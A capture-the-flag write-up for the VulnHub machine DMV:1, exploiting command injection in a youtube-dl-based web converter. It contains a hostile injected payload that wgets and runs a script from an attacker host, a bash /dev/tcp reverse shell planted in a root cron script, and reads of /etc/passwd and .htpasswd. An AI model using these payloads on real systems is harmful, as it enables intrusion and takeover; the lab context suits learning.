Original WriteUp:
VulnHub Link: https://www.vulnhub.com/entry/dmv-1,462/
Description:
It is a simple machine that replicates a real scenario that I found.The goal is to get two flags, one that is in the secret folder and the other that can only be read by the root userThis works better with VirtualBox rather than VMware.
The VirtualBox IP: 192.168.56.101
So as a start and as always a quick nmap scan:
nmap -sC -sV 192.168.56.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 16:25 GMT Daylight Time
Nmap scan report for 192.168.56.101
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:28:AD:53 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
We have only 2 opened ports !
22 (ssh) ==>OpenSSH 7.6p1
80 (http) ==> Apache httpd 2.4.29
and the nmap log show us that we are in a Ubuntu server
Let’s see what we have on port 80 (the web page)
We have some kind of YouTube to MP3 converter !
let’s try to put something in the video ID and intercept the request using BurpSuite
and the sent request from burpsuite:
POST / HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: /
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.56.101/
Content-Length: 57
DNT: 1
Connection: close yt_url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D123456
and The response was:
HTTP/1.1 200 OK
Date: Thu, 16 Apr 2020 15:28:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 392
Connection: close
Content-Type: text/html; charset=UTF-8{“status”:1,“errors”:“WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nERROR: Incomplete YouTube ID 123456. URL https://www.youtube.com/watch?v= 123456 looks truncated.\n”,“url_orginal”:" https://www.youtube.com/watch?v=123456 “,“output”:”",“result_url”:"/tmp/downloads/5e9879861935f.mp3"}
So we have a post request that takes the ID we put and add it to “https://www.youtube.com/watch?v"
It looks from the request “yt_url” that we can change the YouTube URL with something else !
before that we have in response somehow an error ! let’s google this and see what we have
So the website is using a python tool that allows you to convert and download youtube videos to MP3
and I quote from the github link
Command-line program to download videos from YouTube.com and other video sites
before then I start anything I had to check the commands list of this program (youtube-dl)
So let’s try via BurpSuite repeater to print the version info (“ — version” as shown below)
So the version was printed without errors and the program is using the version 2020.03.24 ( not that old )
So from the commits let’s check what we have in this version and specially looking for any bugs !
And if you want to look for bugs (I mean generally in github) don’t search on commits of the current version but you have to check recent ones …
As you notice we have the Mar 23,2020 and the Apr 5, 2020 and more … The last one is on Apr 11, 2020
You can check manually https://github.com/ytdl-org/youtube-dl/commits/master
nothing looks suspicious just some random updates and fixes …
(I hope everything above is clear to now !)
So let’s go back to the command list and see if we can somehow execute commands on system !
So let’s go back to our Burpsuite repeater and try this with changing the command to whoami
Nothing ! but something isn’t normal if you take a look at the url_original value in the response you won’t see
the ‘whoami’ maybe it’s restricting some commands or maybe it takes only what before the space ? let’s URL Encode that and try (the space in URL Encode is +)
nothing too ! still not showing the whoami let’s write whoami without the — exec and without single quotes
so the problem isn’t in whoami let’s write it with single quotes
Now am 100% sure that the problem is in spaces cause I tried also to send more than 20 characters here is an example
So for a quick and smart scan let’s send this over Intruder using special characters list …
The images below will explain how to use the Intruder in BurpSuite
- Configure the position of where you want the payloads will be inserted (write anything and select it and click on Add)
- Copy the special characters list and paste it here (The Payload Section)
Now Click on Start Attack, To compare between the sent requests we should take a look at length case
As you see many different values let’s eliminate the 564 ones cause they had the same error message which is
{“status”:1,“errors”:“WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nERROR: u’!’ is not a valid URL. Set --default-search “ytsearch” (or run youtube-dl “ytsearch:!” ) to search YouTube\n”,“url_orginal”:"!",“output”:"",“result_url”:"/tmp/downloads/5e9881edeff6e.mp3"}
but the special cases having this
{“status”:2,“errors”:" sh: 1: cannot open -f: No such file\n",“url_orginal”:"<",“output”:"",“result_url”:"/tmp/downloads/5e98820f668c1.mp3"}
something is saying “ sh “ 
let’s go back to out Intruder and to the options tab
In the Grep — Match section clear all the values and add sh: 1 or just sh: and go back to the results tab
No we reduce the results to only 9 characters that bypass the program and lead us to use the sh/bash commands …
In the request we have the backquote or the grave accent
If you don’t know what backquote does read this:
When the old-style backquote form of substitution is used, backslash
retains its literal meaning except when followed by $, `, or . The
first backquote not preceded by a backslash terminates the command sub‐
stitution. When using the $(command) form, all characters between the
parentheses make up the command; none are treated specially.Command substitutions may be nested. To nest when using the backquoted
form, escape the inner backquotes with backslashes.
So to make things easier for you guys here is our new payload list
&
(
)
|
`
’
"
<
;
Let’s run another intruder but this time let’s include a command with backquote id
and the command was executed successfully but isn’t showing all the command return !
So if you go down to the response of the other payloads we only one that print everything
so we are going to use this from let’s send that to our repeater and start typing several commands
as you see everything works but still something how to bypass the spaces thing !
if we run ls -la and URL Encode this we get an error message
So I know a bash trick that allows you to bypass WAF and many other space restrictions
replace space with a special shell variable known as “${IFS}” The Internal field separator
and here is a good List for bypassing I found on google (I didn’t try it but they seems correct)
So the easiest way to use this and for few spaces we should start the python SimpleHTTPServer and download our shell to this Box and run it
yt_url=%3ccd${IFS}/var/www/html/images/;wget${IFS}http://192.168.56.1:8080/rev.py;python${IFS}rev.py
images is a writable folder we can find after using ls -la we have also tmp directory and the main is writable too but this just to check if we can run 3 commands in one line using (
separator ,so let’s check if our Listener (nc) is UP and execute the command …
The response isn’t returning anything which means we are successfully connected to the shell
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
dmv:x:1000:1000:dmv:/home/dmv:/bin/bash
let’s search for the first flag
going to the main directory (/var/www/html/)
you will find the first flag on the admin directory
cat /var/www/html/admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}
and also .htpasswd file
cat /var/www/html/admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
If we crack the hash using hashcat we’ll got jessie
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/:jessie
maybe this will be useful for the root part …
Let’s go to the ROOT Part ! (is going to be short this time)
I uploaded many tools for enumeration as LinEnum and LinPeas but couldn’t find anything with these
I tried to use the password we found for the user dmv and nothing too !
I asked for a friend who did the box before I download it 
and he said look in cronjobs but still not finding a thing here !
So I remember that I saw a file in /tmp/ directory named clean.sh with one line
rm -rf downloads
so it clear the bash script delete the folder “downloads” !
So I modified it and put this line
bash -c ‘bash -i >& /dev/tcp/192.168.56.1/4444 0>&1’
and I again run my listener on port 4444
and I was lucky we are r00t
So another way to get the root is using pspy a processor spy
(All the releases are in the link above for both 32bits and 64bits)
from the command uname -a in your shell you’ll define the system CPU architecture
Linux dmv 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64
let’s upload it to our shell and make it executable (chmod +x pspy64) and execute it
So as you see the task is executed each minute with root privileges and our injected reverse shell is still being executed.
I hope everything was clear and excuse my English I’m doing my best here 